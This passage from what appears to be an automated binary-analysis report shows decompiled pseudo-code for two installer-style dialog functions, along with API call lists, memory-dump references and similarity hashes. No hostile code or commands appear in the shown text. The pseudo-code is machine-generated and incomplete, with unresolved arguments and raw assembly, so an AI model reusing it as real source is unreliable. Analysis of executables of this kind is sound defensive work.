                                                          0x00404e4f
                                                          0x00404e52
                                                          0x00404e55
                                                          0x00404e55
                                                          0x00404e5a
                                                          0x00404e63
                                                          0x00404e66
                                                          0x00404e6a
                                                          0x00404e6d
                                                          0x00404e70
                                                          0x00404e79
                                                          0x00404e82
                                                          0x00404e85
                                                          0x00404e88
                                                          0x00404e8b
                                                          0x00404ec9
                                                          0x00404ef4
                                                          0x00404ecb
                                                          0x00404eda
                                                          0x00404eda
                                                          0x00404e8d
                                                          0x00404e90
                                                          0x00404e9e
                                                          0x00404ea8
                                                          0x00404eb0
                                                          0x00404eb7
                                                          0x00404ec2
                                                          0x00404ec2
                                                          0x00404e8b
                                                          0x00404efa
                                                          0x00404efb
                                                          0x00404f07
                                                          0x00404f07
                                                          0x00404f13
                                                          0x00404f2e
                                                          0x00404f31
                                                          0x00404f4e
                                                          0x00000000
                                                          0x00404f33
                                                          0x00404f38
                                                          0x00404f41
                                                          0x004052d3
                                                          0x004052e5
                                                          0x004052e5
                                                          0x00404f31
                                                          0x00000000
                                                          0x00404f13
                                                          0x00404e46

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 00404CED
                                                          • GetDlgItem.USER32 ref: 00404CFA
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
                                                          • LoadImageA.USER32 ref: 00404D60
                                                          • SetWindowLongA.USER32 ref: 00404D7A
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
                                                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404DB6
                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DC2
                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DD2
                                                          • DeleteObject.GDI32(00000110), ref: 00404DD7
                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E02
                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E0E
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EA8
                                                          • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404ED8
                                                            • Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314
                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EEC
                                                          • GetWindowLongA.USER32 ref: 00404F1A
                                                          • SetWindowLongA.USER32 ref: 00404F28
                                                          • ShowWindow.USER32(?,00000005), ref: 00404F38
                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00405033
                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405098
                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050AD
                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050D1
                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050F1
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405106
                                                          • GlobalFree.KERNEL32 ref: 00405116
                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040518F
                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00405238
                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405247
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
                                                          • ShowWindow.USER32(?,00000000), ref: 004052BF
                                                          • GetDlgItem.USER32 ref: 004052CA
                                                          • ShowWindow.USER32(00000000), ref: 004052D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 2564846305-813528018
                                                          • Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                          • Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
                                                          • Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                          • Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                          				struct HWND__* _v32;
                                                          				void* _v84;
                                                          				void* _v88;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t35;
                                                          				signed int _t37;
                                                          				signed int _t39;
                                                          				struct HWND__* _t49;
                                                          				signed int _t68;
                                                          				struct HWND__* _t74;
                                                          				signed int _t87;
                                                          				struct HWND__* _t92;
                                                          				signed int _t100;
                                                          				int _t104;
                                                          				signed int _t116;
                                                          				signed int _t117;
                                                          				int _t118;
                                                          				signed int _t123;
                                                          				struct HWND__* _t126;
                                                          				struct HWND__* _t127;
                                                          				int _t128;
                                                          				long _t131;
                                                          				int _t133;
                                                          				int _t134;
                                                          				void* _t135;
                                                          				void* _t143;
                                                          
                                                          				_t116 = _a8;
                                                          				if(_t116 == 0x110 || _t116 == 0x408) {
                                                          					_t35 = _a12;
                                                          					_t126 = _a4;
                                                          					__eflags = _t116 - 0x110;
                                                          					 *0x42a8a0 = _t35;
                                                          					if(_t116 == 0x110) {
                                                          						 *0x42f448 = _t126;
                                                          						 *0x42a8b4 = GetDlgItem(_t126, 1);
                                                          						_t92 = GetDlgItem(_t126, 2);
                                                          						_push(0xffffffff);
                                                          						_push(0x1c);
                                                          						 *0x429880 = _t92;
                                                          						E004042D1(_t126);
                                                          						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28);
                                                          						 *0x42ec0c = E0040140B(4);
                                                          						_t35 = 1;
                                                          						__eflags = 1;
                                                          						 *0x42a8a0 = 1;
                                                          					}
                                                          					_t123 =  *0x40a1f8; // 0xffffffff
                                                          					_t134 = 0;
                                                          					_t131 = (_t123 << 6) +  *0x42f480;
                                                          					__eflags = _t123;
                                                          					if(_t123 < 0) {
                                                          						L34:
                                                          						E0040431D(0x40b);
                                                          						while(1) {
                                                          							_t37 =  *0x42a8a0;
                                                          							 *0x40a1f8 =  *0x40a1f8 + _t37;
                                                          							_t131 = _t131 + (_t37 << 6);
                                                          							_t39 =  *0x40a1f8; // 0xffffffff
                                                          							__eflags = _t39 -  *0x42f484;
                                                          							if(_t39 ==  *0x42f484) {
                                                          								E0040140B(1);
                                                          							}
                                                          							__eflags =  *0x42ec0c - _t134; // 0x0
                                                          							if(__eflags != 0) {
                                                          								break;
                                                          							}
                                                          							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
                                                          							if(__eflags >= 0) {
                                                          								break;
                                                          							}
                                                          							_t117 =  *(_t131 + 0x14);
                                                          							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                                                          							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                          							_push(0xfffffc19);
                                                          							E004042D1(_t126);
                                                          							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                          							_push(0xfffffc1b);
                                                          							E004042D1(_t126);
                                                          							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                          							_push(0xfffffc1a);
                                                          							E004042D1(_t126);
                                                          							_t49 = GetDlgItem(_t126, 3);
                                                          							__eflags =  *0x42f4ec - _t134;
                                                          							_v32 = _t49;
                                                          							if( *0x42f4ec != _t134) {
                                                          								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                          								__eflags = _t117;
                                                          							}
                                                          							ShowWindow(_t49, _t117 & 0x00000008);
                                                          							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                                                          							E004042F3(_t117 & 0x00000002);
                                                          							_t118 = _t117 & 0x00000004;
                                                          							EnableWindow( *0x429880, _t118);
                                                          							__eflags = _t118 - _t134;
                                                          							if(_t118 == _t134) {
                                                          								_push(1);
                                                          							} else {
                                                          								_push(_t134);
                                                          							}
                                                          							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                                          							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                                          							__eflags =  *0x42f4ec - _t134;
                                                          							if( *0x42f4ec == _t134) {
                                                          								_push( *0x42a8b4);
                                                          							} else {
                                                          								SendMessageA(_t126, 0x401, 2, _t134);
                                                          								_push( *0x429880);
                                                          							}
                                                          							E00404306();
                                                          							E0040624D(0x42a8b8, E00403DDE());
                                                          							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                          							SetWindowTextA(_t126, 0x42a8b8);
                                                          							_push(_t134);
                                                          							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                          							__eflags = _t68;
                                                          							if(_t68 != 0) {
                                                          								continue;
                                                          							} else {
                                                          								__eflags =  *_t131 - _t134;
                                                          								if( *_t131 == _t134) {
                                                          									continue;
                                                          								}
                                                          								__eflags =  *(_t131 + 4) - 5;
                                                          								if( *(_t131 + 4) != 5) {
                                                          									DestroyWindow( *0x42ec18);
                                                          									 *0x42a090 = _t131;
                                                          									__eflags =  *_t131 - _t134;
                                                          									if( *_t131 <= _t134) {
                                                          										goto L58;
                                                          									}
                                                          									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
                                                          									__eflags = _t74 - _t134;
                                                          									 *0x42ec18 = _t74;
                                                          									if(_t74 == _t134) {
                                                          										goto L58;
                                                          									}
                                                          									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                          									_push(6);
                                                          									E004042D1(_t74);
                                                          									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                                          									ScreenToClient(_t126, _t135 + 0x10);
                                                          									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                          									_push(_t134);
                                                          									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                          									__eflags =  *0x42ec0c - _t134; // 0x0
                                                          									if(__eflags != 0) {
                                                          										goto L61;
                                                          									}
                                                          									ShowWindow( *0x42ec18, 8);
                                                          									E0040431D(0x405);
                                                          									goto L58;
                                                          								}
                                                          								__eflags =  *0x42f4ec - _t134;
                                                          								if( *0x42f4ec != _t134) {
                                                          									goto L61;
                                                          								}
                                                          								__eflags =  *0x42f4e0 - _t134;
                                                          								if( *0x42f4e0 != _t134) {
                                                          									continue;
                                                          								}
                                                          								goto L61;
                                                          							}
                                                          						}
                                                          						DestroyWindow( *0x42ec18);
                                                          						 *0x42f448 = _t134;
                                                          						EndDialog(_t126,  *0x429c88);
                                                          						goto L58;
                                                          					} else {
                                                          						__eflags = _t35 - 1;
                                                          						if(_t35 != 1) {
                                                          							L33:
                                                          							__eflags =  *_t131 - _t134;
                                                          							if( *_t131 == _t134) {
                                                          								goto L61;
                                                          							}
                                                          							goto L34;
                                                          						}
                                                          						_push(0);
                                                          						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                          						__eflags = _t87;
                                                          						if(_t87 == 0) {
                                                          							goto L33;
                                                          						}
                                                          						SendMessageA( *0x42ec18, 0x40f, 0, 1);
                                                          						__eflags =  *0x42ec0c - _t134; // 0x0
                                                          						return 0 | __eflags == 0x00000000;
                                                          					}
                                                          				} else {
                                                          					_t126 = _a4;
                                                          					_t134 = 0;
                                                          					if(_t116 == 0x47) {
                                                          						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
                                                          					}
                                                          					if(_t116 == 5) {
                                                          						asm("sbb eax, eax");
                                                          						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
                                                          					}
                                                          					if(_t116 != 0x40d) {
                                                          						__eflags = _t116 - 0x11;
                                                          						if(_t116 != 0x11) {
                                                          							__eflags = _t116 - 0x111;
                                                          							if(_t116 != 0x111) {
                                                          								L26:
                                                          								return E00404338(_t116, _a12, _a16);
                                                          							}
                                                          							_t133 = _a12 & 0x0000ffff;
                                                          							_t127 = GetDlgItem(_t126, _t133);
                                                          							__eflags = _t127 - _t134;
                                                          							if(_t127 == _t134) {
                                                          								L13:
                                                          								__eflags = _t133 - 1;
                                                          								if(_t133 != 1) {
                                                          									__eflags = _t133 - 3;
                                                          									if(_t133 != 3) {
                                                          										_t128 = 2;
                                                          										__eflags = _t133 - _t128;
                                                          										if(_t133 != _t128) {
                                                          											L25:
                                                          											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
                                                          											goto L26;
                                                          										}
                                                          										__eflags =  *0x42f4ec - _t134;
                                                          										if( *0x42f4ec == _t134) {
                                                          											_t100 = E0040140B(3);
                                                          											__eflags = _t100;
                                                          											if(_t100 != 0) {
                                                          												goto L26;
                                                          											}
                                                          											 *0x429c88 = 1;
                                                          											L21:
                                                          											_push(0x78);
                                                          											L22:
                                                          											E004042AA();
                                                          											goto L26;
                                                          										}
                                                          										E0040140B(_t128);
                                                          										 *0x429c88 = _t128;
                                                          										goto L21;
                                                          									}
                                                          									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
                                                          									if(__eflags <= 0) {
                                                          										goto L25;
                                                          									}
                                                          									_push(0xffffffff);
                                                          									goto L22;
                                                          								}
                                                          								_push(_t133);
                                                          								goto L22;
                                                          							}
                                                          							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                          							_t104 = IsWindowEnabled(_t127);
                                                          							__eflags = _t104;
                                                          							if(_t104 == 0) {
                                                          								goto L61;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						SetWindowLongA(_t126, _t134, _t134);
                                                          						return 1;
                                                          					} else {
                                                          						DestroyWindow( *0x42ec18);
                                                          						 *0x42ec18 = _a12;
                                                          						L58:
                                                          						if( *0x42b8b8 == _t134) {
                                                          							_t143 =  *0x42ec18 - _t134; // 0x0
                                                          							if(_t143 != 0) {
                                                          								ShowWindow(_t126, 0xa);
                                                          								 *0x42b8b8 = 1;
                                                          							}
                                                          						}
                                                          						L61:
                                                          						return 0;
                                                          					}
                                                          				}
                                                          			}































                                                          0x00403e06
                                                          0x00403e0f
                                                          0x00403f50
                                                          0x00403f54
                                                          0x00403f58
                                                          0x00403f5a
                                                          0x00403f5f
                                                          0x00403f6a
                                                          0x00403f75
                                                          0x00403f7a
                                                          0x00403f7c
                                                          0x00403f7e
                                                          0x00403f81
                                                          0x00403f86
                                                          0x00403f94
                                                          0x00403fa1
                                                          0x00403fa8
                                                          0x00403fa8
                                                          0x00403fa9
                                                          0x00403fa9
                                                          0x00403fae
                                                          0x00403fb4
                                                          0x00403fbb
                                                          0x00403fc1
                                                          0x00403fc3
                                                          0x00404003
                                                          0x00404008
                                                          0x0040400d
                                                          0x0040400d
                                                          0x00404012
                                                          0x0040401b
                                                          0x0040401d
                                                          0x00404022
                                                          0x00404028
                                                          0x0040402c
                                                          0x0040402c
                                                          0x00404031
                                                          0x00404037
                                                          0x00000000
                                                          0x00000000
                                                          0x00404042
                                                          0x00404048
                                                          0x00000000
                                                          0x00000000
                                                          0x00404051
                                                          0x00404059
                                                          0x0040405e
                                                          0x00404061
                                                          0x00404067
                                                          0x0040406c
                                                          0x0040406f
                                                          0x00404075
                                                          0x0040407a
                                                          0x0040407d
                                                          0x00404083
                                                          0x0040408b
                                                          0x00404091
                                                          0x00404097
                                                          0x0040409b
                                                          0x004040a2
                                                          0x004040a2
                                                          0x004040a2
                                                          0x004040ac
                                                          0x004040be
                                                          0x004040ca
                                                          0x004040cf
                                                          0x004040d9
                                                          0x004040df
                                                          0x004040e1
                                                          0x004040e6
                                                          0x004040e3
                                                          0x004040e3
                                                          0x004040e3
                                                          0x004040f6
                                                          0x0040410e
                                                          0x00404110
                                                          0x00404116
                                                          0x0040412b
                                                          0x00404118
                                                          0x00404121
                                                          0x00404123
                                                          0x00404123
                                                          0x00404131
                                                          0x00404142
                                                          0x00404153
                                                          0x0040415a
                                                          0x00404160
                                                          0x00404164
                                                          0x00404169
                                                          0x0040416b
                                                          0x00000000
                                                          0x00404171
                                                          0x00404171
                                                          0x00404173
                                                          0x00000000
                                                          0x00000000
                                                          0x00404179
                                                          0x0040417d
                                                          0x004041a2
                                                          0x004041a8
                                                          0x004041ae
                                                          0x004041b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004041d6
                                                          0x004041dc
                                                          0x004041de
                                                          0x004041e3
                                                          0x00000000
                                                          0x00000000
                                                          0x004041e9
                                                          0x004041ec
                                                          0x004041ef
                                                          0x00404206
                                                          0x00404212
                                                          0x0040422b
                                                          0x00404231
                                                          0x00404235
                                                          0x0040423a
                                                          0x00404240
                                                          0x00000000
                                                          0x00000000
                                                          0x0040424a
                                                          0x00404255
                                                          0x00000000
                                                          0x00404255
                                                          0x0040417f
                                                          0x00404185
                                                          0x00000000
                                                          0x00000000
                                                          0x0040418b
                                                          0x00404191
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404197
                                                          0x0040416b
                                                          0x00404262
                                                          0x0040426e
                                                          0x00404275
                                                          0x00000000
                                                          0x00403fc5
                                                          0x00403fc5
                                                          0x00403fc8
                                                          0x00403ffb
                                                          0x00403ffb
                                                          0x00403ffd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403ffd
                                                          0x00403fca
                                                          0x00403fce
                                                          0x00403fd3
                                                          0x00403fd5
                                                          0x00000000
                                                          0x00000000
                                                          0x00403fe5
                                                          0x00403fed
                                                          0x00000000
                                                          0x00403ff3
                                                          0x00403e21
                                                          0x00403e21
                                                          0x00403e25
                                                          0x00403e2a
                                                          0x00403e39
                                                          0x00403e39
                                                          0x00403e42
                                                          0x00403e4b
                                                          0x00403e56
                                                          0x00403e56
                                                          0x00403e62
                                                          0x00403e7e
                                                          0x00403e81
                                                          0x00403e94
                                                          0x00403e9a
                                                          0x00403f3d
                                                          0x00000000
                                                          0x00403f46
                                                          0x00403ea0
                                                          0x00403ead
                                                          0x00403eaf
                                                          0x00403eb1
                                                          0x00403ed0
                                                          0x00403ed0
                                                          0x00403ed3
                                                          0x00403ed8
                                                          0x00403edb
                                                          0x00403eeb
                                                          0x00403eec
                                                          0x00403eee
                                                          0x00403f24
                                                          0x00403f37
                                                          0x00000000
                                                          0x00403f37
                                                          0x00403ef0
                                                          0x00403ef6
                                                          0x00403f0f
                                                          0x00403f14
                                                          0x00403f16
                                                          0x00000000
                                                          0x00000000
                                                          0x00403f18
                                                          0x00403f04
                                                          0x00403f04
                                                          0x00403f06
                                                          0x00403f06
                                                          0x00000000
                                                          0x00403f06
                                                          0x00403ef9
                                                          0x00403efe
                                                          0x00000000
                                                          0x00403efe
                                                          0x00403edd
                                                          0x00403ee3
                                                          0x00000000
                                                          0x00000000
                                                          0x00403ee5
                                                          0x00000000
                                                          0x00403ee5
                                                          0x00403ed5
                                                          0x00000000
                                                          0x00403ed5
                                                          0x00403ebb
                                                          0x00403ec2
                                                          0x00403ec8
                                                          0x00403eca
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403eca
                                                          0x00403e86
                                                          0x00000000
                                                          0x00403e64
                                                          0x00403e6a
                                                          0x00403e74
                                                          0x0040427b
                                                          0x00404281
                                                          0x00404283
                                                          0x00404289
                                                          0x0040428e
                                                          0x00404294
                                                          0x00404294
                                                          0x00404289
                                                          0x0040429e
                                                          0x00000000
                                                          0x0040429e
                                                          0x00403e62

                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
                                                          • ShowWindow.USER32(?), ref: 00403E56
                                                          • DestroyWindow.USER32 ref: 00403E6A
                                                          • SetWindowLongA.USER32 ref: 00403E86
                                                          • GetDlgItem.USER32 ref: 00403EA7
                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBB
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403EC2
                                                          • GetDlgItem.USER32 ref: 00403F70
                                                          • GetDlgItem.USER32 ref: 00403F7A
                                                          • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403F94
                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FE5
                                                          • GetDlgItem.USER32 ref: 0040408B
                                                          • ShowWindow.USER32(00000000,?), ref: 004040AC
                                                          • EnableWindow.USER32(?,?), ref: 004040BE
                                                          • EnableWindow.USER32(?,?), ref: 004040D9
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040EF
                                                          • EnableMenuItem.USER32 ref: 004040F6
                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040410E
                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404121
                                                          • lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
                                                          • SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
                                                          • ShowWindow.USER32(?,0000000A), ref: 0040428E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID:
                                                          • API String ID: 184305955-0
                                                          • Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                          • Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
                                                          • Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                          • Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                          				char _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				struct HWND__* _t52;
                                                          				long _t86;
                                                          				int _t98;
                                                          				struct HWND__* _t99;
                                                          				signed int _t100;
                                                          				intOrPtr _t107;
                                                          				intOrPtr _t109;
                                                          				int _t110;
                                                          				signed int* _t112;
                                                          				signed int _t113;
                                                          				char* _t114;
                                                          				CHAR* _t115;
                                                          
                                                          				if(_a8 != 0x110) {
                                                          					if(_a8 != 0x111) {
                                                          						L11:
                                                          						if(_a8 != 0x4e) {
                                                          							if(_a8 == 0x40b) {
                                                          								 *0x429884 =  *0x429884 + 1;
                                                          							}
                                                          							L25:
                                                          							_t110 = _a16;
                                                          							L26:
                                                          							return E00404338(_a8, _a12, _t110);
                                                          						}
                                                          						_t52 = GetDlgItem(_a4, 0x3e8);
                                                          						_t110 = _a16;
                                                          						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                          							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                          							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                          							_v12 = _t100;
                                                          							_v16 = _t109;
                                                          							_v8 = 0x42e3e0;
                                                          							if(_t100 - _t109 < 0x800) {
                                                          								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                          								SetCursor(LoadCursorA(0, 0x7f02));
                                                          								_push(1);
                                                          								_t40 =  &_v8; // 0x42e3e0
                                                          								E004046E0(_a4,  *_t40);
                                                          								SetCursor(LoadCursorA(0, 0x7f00));
                                                          								_t110 = _a16;
                                                          							}
                                                          						}
                                                          						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                          							goto L26;
                                                          						} else {
                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                          								SendMessageA( *0x42f448, 0x111, 1, 0);
                                                          							}
                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                          								SendMessageA( *0x42f448, 0x10, 0, 0);
                                                          							}
                                                          							return 1;
                                                          						}
                                                          					}
                                                          					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
                                                          						goto L25;
                                                          					} else {
                                                          						_t112 =  *0x42a090 + 0x14;
                                                          						if(( *_t112 & 0x00000020) == 0) {
                                                          							goto L25;
                                                          						}
                                                          						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                          						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                          						E004046BC();
                                                          						goto L11;
                                                          					}
                                                          				}
                                                          				_t98 = _a16;
                                                          				_t113 =  *(_t98 + 0x30);
                                                          				if(_t113 < 0) {
                                                          					_t107 =  *0x42ec1c; // 0x53f080
                                                          					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                          				}
                                                          				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                          				_t114 = _t113 +  *0x42f498;
                                                          				_push(0x22);
                                                          				_a16 =  *_t114;
                                                          				_v12 = _v12 & 0x00000000;
                                                          				_t115 = _t114 + 1;
                                                          				_v16 = _t115;
                                                          				_v8 = E00404407;
                                                          				E004042D1(_a4);
                                                          				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                          				_push(0x23);
                                                          				E004042D1(_a4);
                                                          				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                          				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                          				_t99 = GetDlgItem(_a4, 0x3e8);
                                                          				E00404306(_t99);
                                                          				SendMessageA(_t99, 0x45b, 1, 0);
                                                          				_t86 =  *( *0x42f454 + 0x68);
                                                          				if(_t86 < 0) {
                                                          					_t86 = GetSysColor( ~_t86);
                                                          				}
                                                          				SendMessageA(_t99, 0x443, 0, _t86);
                                                          				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                          				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                          				 *0x429884 = 0;
                                                          				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                          				 *0x429884 = 0;
                                                          				return 0;
                                                          			}


















                                                          0x0040444c
                                                          0x00404571
                                                          0x004045cd
                                                          0x004045d1
                                                          0x0040469e
                                                          0x004046a0
                                                          0x004046a0
                                                          0x004046a6
                                                          0x004046a6
                                                          0x004046a9
                                                          0x00000000
                                                          0x004046b0
                                                          0x004045df
                                                          0x004045e1
                                                          0x004045eb
                                                          0x004045f6
                                                          0x004045f9
                                                          0x004045fc
                                                          0x00404607
                                                          0x0040460a
                                                          0x00404611
                                                          0x0040461f
                                                          0x00404637
                                                          0x00404639
                                                          0x0040463b
                                                          0x00404641
                                                          0x00404650
                                                          0x00404652
                                                          0x00404652
                                                          0x00404611
                                                          0x0040465c
                                                          0x00000000
                                                          0x00404667
                                                          0x0040466b
                                                          0x0040467c
                                                          0x0040467c
                                                          0x00404682
                                                          0x00404690
                                                          0x00404690
                                                          0x00000000
                                                          0x00404694
                                                          0x0040465c
                                                          0x0040457c
                                                          0x00000000
                                                          0x00404590
                                                          0x00404596
                                                          0x0040459c
                                                          0x00000000
                                                          0x00000000
                                                          0x004045c1
                                                          0x004045c3
                                                          0x004045c8
                                                          0x00000000
                                                          0x004045c8
                                                          0x0040457c
                                                          0x00404452
                                                          0x00404455
                                                          0x0040445a
                                                          0x0040445c
                                                          0x0040446b
                                                          0x0040446b
                                                          0x00404472
                                                          0x00404475
                                                          0x00404477
                                                          0x0040447c
                                                          0x00404485
                                                          0x0040448b
                                                          0x00404497
                                                          0x0040449a
                                                          0x004044a3
                                                          0x004044a8
                                                          0x004044ab
                                                          0x004044b0
                                                          0x004044c7
                                                          0x004044ce
                                                          0x004044e1
                                                          0x004044e4
                                                          0x004044f9
                                                          0x00404500
                                                          0x00404505
                                                          0x0040450a
                                                          0x0040450a
                                                          0x00404519
                                                          0x00404528
                                                          0x0040453a
                                                          0x0040453f
                                                          0x0040454f
                                                          0x00404551
                                                          0x00000000

                                                          APIs
                                                          • CheckDlgButton.USER32 ref: 004044C7
